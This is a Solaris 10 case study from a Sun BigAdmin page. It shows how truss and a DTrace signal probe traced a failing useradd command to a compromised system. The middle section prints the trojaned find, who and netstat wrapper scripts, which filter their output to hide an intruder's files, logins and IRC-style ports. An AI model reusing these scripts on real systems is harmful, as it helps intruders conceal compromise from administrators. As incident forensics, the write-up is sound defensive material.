Case Study: Using DTrace and truss in the Solaris 10 OS

Wynne Wang, April 2008

This case study focuses on leveraging DTrace and truss to troubleshoot the Solaris 10 Operating System. DTrace is a debugging feature of the Solaris 10 OS.

Recently, a customer called me about an unusual issue with the Solaris 10 OS. I have been supporting this customer's Web 2.0 online product for the last six months.

The customer found that he couldn't add a new user. He tried to add a user using a command similar to useradd -m -d /home/test test to indicate the user's home directory as /home/. The following error message was displayed:

# useradd -m -g test -d /home/test -c "test user." \
-m -s /bin/bash test
UX: useradd: ERROR: Unable to change owner of files home \
directory: No such file or directory.

So, the customer called me for help. It seemed like a simple Solaris configuration issue. We know that Solaris automounts the /home directory. So, if we want to use the /home directory, we must make sure autofs is not running, and then we can create contents inside /home.

All the steps are easy and well documented. We opened the /etc/auto_master file and it looked like this:

+auto_master
/net        -hosts          -nosuid,nobrowse
/home       auto_home       -nobrowse

We commented out the last line as follows, which turned off the autofs mount for the home directory in the configuration:

#/home      auto_home       -nobrowse

Then we restarted the autofs service, and tried the useradd command again. It should have worked well now, right? But what surprised us is that we still got the following response:

UX: useradd: ERROR: Unable to change owner of files home \
directory: No such file or directory.

What could be wrong?

Searching the knowledge database provided nothing useful. Several similar questions appear there, but the solution didn't help.

So, I tried using truss to dig into the command. What on earth was the command doing? It printed out every syscall the application made and the parameters. By examining the detailed log info, I found a hint.

#truss -f -o /tmp/useradd.out useradd -m -d /home/test test

I used -f to follow the children in case they forked a new process. And I opened the /tmp/useradd.out file, which holds the log info while the useradd command runs:

# truss -f useradd -m -d /home/test7 test7
1710: execve("/usr/sbin/useradd", 0x08047C9C, 0x08047CB4)  argc = 5
1710: resolvepath("/usr/lib/ld.so.1", "/lib/ld.so.1", 1023) = 12
1710: resolvepath("/usr/sbin/useradd", "/usr/sbin/useradd", 1023) = 17
1710: sysconfig(_CONFIG_PAGESIZE)                     = 4096
1710: xstat(2, "/usr/sbin/useradd", 0x08047A88)       = 0
1710: open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
........

Wow...the output file seemed 10,000 lines long.

After digging for hours, I found a clue. The useradd process called fork() to generate several children, and one of the children, 1755, died abnormally.

Received signal #18, SIGCLD [caught]
1749:  siginfo: SIGCLD CLD_EXITED pid=1755 status=0x0001

When I compared the output to the output of a normal useradd command, I found that SIGCLD didn't appear in the normal output. After that signal, the children all exited and caused the main process error. Then the useradd command ran into an error. I wondered if this was the root cause of the problem. Who sent the signal to the innocent child?

Fortunately, Sun has a powerful debugging tool, DTrace, which could help us to dig into the Solaris kernel to find out what it was doing. So I wrote a small DTrace probe to log who was sending the signal.

The probe looked like this:

#!/usr/sbin/dtrace -qs
proc:::signal-send
/args[2] == SIGCHLD/
{
   printf("SIGCLD was sent by %s pid=%d \n", \
   args[1]->pr_fname,args[1]->pr_pid);
}

This probe would trigger when something sends a SIGCLD signal. The pr_fname is the process name, and the pid is the process ID (PID).

I started the probe and made it wait in the background, and then I ran the useradd command again.

It worked. DTrace honestly reported the process name and PID that sent the SIGCLD signal. SIGCLD was sent by find and the PID was 1499.

I couldn't believe it. The find command is the most used UNIX command. Why did it close my child?

I used which find to get its exact location, and learned that it is the /usr/bin/find program. So I needed to go to that location and determine why.

I went to the /usr/bin directory. The poor find was there, and it seemed quiet and innocent.

So I used file /usr/bin/find to see what on earth this file really is. The output told me it was a script file. Normally, find should be a binary executable. So I used vi /usr/bin/find to see the content of the file.

Inside the find file, I found that the script looked like this:

#!/bin/ksh -p
if [ -f /usr/bin/i86/ps ]; then
   /usr/sbin/i86/find "$@" | grep -v grep | grep -v System | \
   grep -v /usr/bin/find | grep -v EWG | grep -v syscfg | \
   grep -v .elite | grep -v cj | grep -v glftpd | \
   grep -v S12system | grep -v S32networks | grep -v S09init | \
   grep -v lost+found
fi

It seemed like this find script checks whether /usr/sbin/i86/ps exists, and if it does, it calls the real find program to do the work and filter the output with keywords such as EWG, glftpd, and so on.

I knew that find is very a frequently used program, and it should not hide any info. So, why does this script filter the info? Did someone modify find to try to cover up something?

I ran ls -tral /usr/bin to see the last time find was modified. The output looked like this:

-rwxrwxrwx   1 root     other        177  7 30 17:33 w
-rwxrwxrwx   1 root     other        181  7 30 17:34 who
-rwxrwxrwx   1 root     other         87  7 30 17:36 uptime
-rwxrwxrwx   1 root     other        239  7 30 17:37 ptree
-rwxrwxrwx   1 root     other        311  7 30 17:41 netstat
-rwxrwxrwx   1 root     other        198  7 30 17:43 last
-rwxrwxrwx   1 root     other        360  7 30 18:14 ls
-rwxrwxrwx   1 root     other        314  7 30 18:17 cat
-rwxrwxrwx   1 root     other        219  7 30 18:18 du
-rwxrwxrwx   1 root     other        222  7 30 18:19 ps
-rwsr-xr-x   1 root     root        6696  8 20 12:30 EWG
-rwxr-xr-x   1 root     root         300  1 23 17:29 find
-r-xr-xr-x   1 root     root       18720  1 23 17:49 ls
-rwsr-xr-x   1 root     root        6696  1 23 17:51 EWG
 rwxr-xr-x   4 root     bin        17920  1 24 11:28 .

It seems find, who, netstat, du, and cat were all modified recently. So, I checked whether these commands were dirty or clean.

The command file /usr/bin/who told me that who was a script instead of a binary. The contents looked like this:

#!/bin/ksh -p
if [ -f /usr/bin/i86/ps ]; then
  /usr/sbin/i86/who "$@" | grep -v grep | grep -v /usr/bin/who \
  | grep -v CjB | grep -v cjb | grep -v daemon | grep -v sys
fi

It seemed as if someone wanted to log in and not be known.

The command file /usr/bin/netstat also told me that netstat was a script. The contents looked like this:

#!/bin/ksh -p
if [ -f /usr/bin/i86/ps ]; then
  /usr/sbin/i86/netstat "$@" | grep -v grep | grep -v System \
  | grep -v /usr/bin/netstat | grep -v EWG | grep -v gl ftpd \
  | grep -v 6667 | grep -v 7000 | grep -v 6666 | grep -v 6668 \
  | grep -v 6669 | grep -v 9000 | grep -v 8337 | grep -v 6969 \
  | grep -v 98
fi

Wow ... there must a secret. Someone was trying to hide the communication by port 6667/7000/6666/6668/6669/9000/8337, and this did not seem right.

We copied /usr/sbin/i86/find to the /usr/bin directory and ran the useradd command again. Great, then we were able to create a new user!

And then, of course, we called the IT security department to advise us on the next step to take.

For More Information

Here are additional resources:

  • These and other Sun training courses at http://www.sun.com/training/:

    • Dynamic Performance Tuning and Troubleshooting With DTrace Seminar (SEM-SA-327-S10)
    • Dynamic Performance Tuning and Troubleshooting With DTrace (SA-327-S10)
    • DTrace Facility (VC-SA-327-S10)
    • DTrace Fundamentals and Troubleshooting DTrace Problems (WS-3270-S10)
    • Turbocharging Application Performance with DTrace (SEM-DTJ-2327)
    • Solaris 10 Features for Experienced Solaris System Administrators (SA-225-S10)
    • Solaris 10: Ten Moves Ahead of the Competition (WS-245)
  • Support:

  • Discussions, such as the Solaris Forums

  • Documentation, such as the following, at http://docs.sun.com:

    • dtrace(7D) in "man pages section 7: Device and Network Interfaces" of the Solaris 10 Reference Manual Collection
    • Solaris Dynamic Tracing Guide
    • DTrace User Guide
    • DTrace Quick Reference Guide
  • DTrace wiki

  • DTrace resources on BigAdmin, with links to documentation, web sites, blogs, useful scripts, and more

  • Using DTrace from a Solaris 10 System (how to guide) (or PDF version)

  • dtrace_oneliners, a summary of handy DTrace shell commands from Brendan Gregg

  • Events of interest to users of Sun products:


Comments (latest comments first)

Discuss and comment on this resource in the BigAdmin Wiki
 

Unless otherwise licensed, code in all technical manuals herein (including articles, FAQs, samples) is provided under this License.

Left Curve
Popular Downloads
Right Curve
Untitled Document
Left Curve
More Systems Downloads
Right Curve